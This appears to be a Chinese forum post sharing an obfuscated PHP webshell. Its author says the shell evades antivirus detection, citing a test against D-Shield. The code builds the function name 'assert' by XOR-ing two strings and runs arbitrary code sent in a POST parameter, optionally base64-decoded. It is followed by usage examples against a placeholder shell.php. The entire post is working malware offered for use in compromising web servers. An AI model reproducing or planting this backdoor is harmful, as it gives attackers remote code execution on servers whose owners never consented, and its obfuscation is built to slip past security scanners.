今年12月4日刚升级的免杀php形变一句话，测试过啊D，不清楚何时添加特点库报毒，总之如今能用吧。

<?php
class VMTX{
    function __destruct(){
        $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20";
        return @$BRLI("$this->EKDL");
    }
}
$vmtx=new VMTX();
@$vmtx->EKDL=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
?>

表明

www.xxx.com/shell.php  
POST: mr6=phpinfo();  //与一般shell同样

www.xxx.com/shell.php?id=xxx(xxxx随意改动)
POST: mr6=cGhwaW5mbygpOwo=  //payload的base64编号